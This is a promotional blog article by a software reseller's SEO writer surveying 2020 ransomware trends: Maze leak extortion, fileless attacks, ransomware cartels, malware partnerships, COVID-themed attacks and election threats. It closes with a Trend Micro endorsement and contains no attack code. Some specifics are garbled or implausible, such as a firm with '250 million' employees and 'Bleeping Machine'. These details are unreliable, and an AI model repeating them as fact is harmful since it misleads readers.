Ransomware Trends to Watch Out in 2020

Cyber Security

Written by:

Reading Time: 7 minutes

Ransomware trends are increasing in intensity and sophistication. An infection with ransomware can have a substantial financial effect on a business or organization. Ransomware costs corporations more than $75 billion a year. The expense of downtime leading to loss of income contributes significantly to the economic impact. 

But cybersecurity attacks like ransomware spare no one. Even an individual user can be a victim. Attackers’ favorites are CEOs and corporate leaders for the information they carry, even on their devices. 

No sector is immune as well. Highly advanced ransomware attackers target local governments, manufacturing industries, hospitals, schools, banks, and other financial institutions. 

Ransomware attackers will victimize whoever is vulnerable. They can exploit whatever weaknesses or vulnerabilities they find in systems, whether it’s a business or not. 

Paying Ransom Does Not Stop Ransomware Attacks

Since ransomware cybercriminals threaten to release files, trade secrets, and even anomalies, they find victims who fall prey to pay the ransom. But paying the ransom does not guarantee that attackers will do their end of the deal. Some attackers still follow through with leaking data even upon ransom payments are made. 

Hundreds of thousands of dollars are lost just to pay attackers and prevent leaking sensitive data. If they do not have cyber insurance or workers compensation insurance, such costs could pose a massive problem for businesses and corporations. 

They would then need to take the time to plan for a data breach. But before they could prepare a defense against ransomware attack trends, they need to be aware of the different kinds of ransomware attacks rampant today. 

6 Ransomware Attack Trends to Be Aware Of

  1.  Ransomware Leaks

Image source

Over the past few years, data backups have foiled more than a handful of ransomware attacks. Data backups allowed victims to dismiss the ransom demands of attackers and recover their information for free. This preparedness left cyberattackers with little for their work to reveal. 

That changed when Bleeping Machine got an email from the group responsible for creating ransomware for Maze in November 2019. Attackers told the computer self-help website that they had executed Maze on a security staffing company’s network that employed more than 250 million people. 

The attackers replicated the data they had discovered on the organization’s network and exfiltrated it under their power to a server. They did this before they instructed Maze to begin encrypting the original files already on the system. 

If the victim declined to follow the ransom demand, the attackers told Bleeping Machine they would begin posting the details online. 

Their goal was to compel the business to pay a ransom to keep its data assets from being publicly exposed. In doing so, they developed a two-pronged assault that targeted the confidentiality and accessibility of information about a victim.

Maze ransomware operators also made a ransomware attack on LG and Xerox. They recently published 50.2 GB of stolen data after two failed extortion attempts.

The Maze gang is famous for its eponymous ransomware string. The team usually operates by breaching corporate networks, stealing sensitive files first, encrypting data second. 

If victims don’t give in during this second extortion attempt, the gang will publish files on its 

Portal. LG and Xerox are at this last stage after apparently refusing to meet the Maze gang’s demands.

  1.  Fileless Attacks 

Fileless malware attacks would become more widespread. The security community has noted a spike in fileless attacks recently. This kind of ransomware attack is a strategy to threaten organizations or corporations. 

Fileless attacks typically begin with a spam message that leads victims to a malicious website. If a victim is in the malicious site. In that case, it loads Flash on the victim’s computer, which in turn operates from the Windows PowerShell tool, releasing instructions while using the device memory. 

The malicious scripts from the attacker’s command-and-control server are then loaded to the device by the ransomware attacker. 

Security researchers have tracked more types of digital threats starting to integrate fileless methods into their attack chains. In November 2019, for example, Malwarebytes reported that exploit kits are gradually migrating to fileless attacks. 3 out of 9 active exploit kits active today utilize fileless attacks.

Researchers have also detected threatening actors pairing fileless strategies with SOREBRECT, GandCrab, FT CODE, and other ransomware families in recent years. Malware writers will undoubtedly continue to integrate these types of capabilities into their creations in an attempt to avoid detection by signature-based tools.

  1.  Ransomware Gangs Form Ransom Cartels

Ransomware gangs collaborating for extortion is another ransomware trend. They do it through a shared data leak network, exchanging techniques and information.

In November 2019, Maze Ransomware operators turned ransomware attacks into data breaches after releasing unencrypted data of those who refused to pay. Soon after, they released a “Maze News” platform used to ridicule their unpaid victims by publishing stolen data publicly.

Bleeping Computer announced that KeLa discovered Maze added data from an architectural firm to its “Maze News” data leak website. Bleeping Computer security researchers noticed the stolen information was not connected to Maze’s attack. Instead, data traced back to a LockBit ransomware-as-a-service (RaaS) platform infection.

For clarity about what was going on, those who analyzed the data breach contacted Maze. The attackers replied that they had agreed to partner with LockBit to exchange their platform for data leaks and gain experience with less known ransomware actors. The Maze gang also announced that they had talked to other ransomware families involved in joining their potential “cartel.”

  1.  Coordination With Other Types of Malware

Image source

Ransomware gangs and writers of other forms of malware, such as trojans and remote access instruments (RATs), found that they could execute more organized and evasive attack campaigns by working together. 

During the first half of 2020, this cooperation flowed in both directions. Security researchers discovered a website claimed to be the legal download portal for a device utility that enhances Windows systems’ performance in March. 

Bleeping Computer noticed that two files were downloaded onto a victim’s machine by the fake program. For Kpot, this threat provided protection. Kpot is a trojan dropped by “file1.exe” that steals passwords.

It stole the victim’s data and then uploaded it under the attackers’ control to a remote server.

  1.  Hackers Target Hospitals with Ransomware Amid the Coronavirus Pandemic

Image source: Ilya Lukichev | Getty Images

Ransomware attackers also weaponized the recent health crisis. Using the term “coronavirus” to prey on and victimize users. They produced ransomware that capitalized on the attempts of users to fight against the pandemic. 

CryCryptor was a strain of ransomware discovered in June 2020 by the Slovak security firm ESET. This specific family masqueraded as an official tracing software for COVID-19 to encrypt Android users’ smartphones. 

Ransomware cartels went further by targeting hospitals and health care organizations during the COVID-19 pandemic.

When hospitals were trying to cope with a flood of patients suffering from COVID-19, healthcare professionals and medical facilities in the U.S. and Europe suffered an increase in ransomware attacks attempting to leverage the crisis and attack the healthcare industry at its weakest.

  1.  Persistent Security Threats for the U.S. Election

The 2020 U.S. presidential election’s security is of interest to Infosec experts and election security officials alike. Valimail examined the three largest electoral districts in each U.S. state to analyze their defenses against email IP spoofing, as reported by TechCrunch. 

The digital security solutions provider found that with DMARC, a protocol useful for validating a sender’s legitimacy, administrators had secured only 10 of the 187 election-related domains. 

Threat actors can trick the election commission into opening a malicious file attachment or visiting a suspicious web site without this type of protection. 

This possibility worries the Cybersecurity Infrastructure Security Agency (CISA). That explains why, in August 2019, CISA announced its intention to establish a program to help states secure those databases. 

“Recent history has shown that ransomware attacks threaten state and county governments and those who help them,” said Christopher Krebs, CISA director, as quoted by Reuters.

Also, malicious actors would possibly be involved in launching politically-themed malware attacks around the election. It occurred with the CIA Election AntiCheat Regulation back in 2016. In November 2019, when the “Donald Trump Screen of Death” came across, Cisco Talos researchers observed something similar.

Conclusion: Stay Vigilant Against Ransomware Attacks 

Companies need to focus on preventing a crypto-malware attack. Detecting an attack that’s in progress is just not enough. Organizations should gain visibility over their assets. In the absence of oversight, malicious actors could abuse several known security vulnerabilities to access and move laterally across the network.

Companies can use passive asset management tools to identify all connected hardware and software to combat this threat. Artificial Intelligence tools and network monitoring solutions are needed to keep the network safe from ransomware attacks.

From individuals to corporations, there is a need to create a security-aware culture. Be aware of common phishing attacks that typically lead to ransomware. When buying software online, especially if installing OS, it is good to check if Windows key is valid or if the software you are buying comes from a legit online software store

Employees need to know the trends and threats to cybersecurity to help in avoiding and mitigating security issues. Security software like Trend Micro ransomware protection is a trusted solution against ransomware and malware attack.

Trend Micro ransomware protection has a track record of more than 100 million threats blocked since October 2015, both for web ransomware and for Android mobile ransomware threats that have increased up to 15 times higher since 2015.

When we employ different layers of cybersecurity measures and stay vigilant, we will combat ransomware attacks more efficiently. 

AUTHOR BIO

MAYLEEN MEÑEZ

Mayleen Meñez used to work in media before finding her true passion in NGO work, travelling the Philippines and Asia doing so. She homeschools 3 kids and loves reinventing Filipino dishes. She is a resident SEO writer for Softvire Australia and Softvire New Zealand.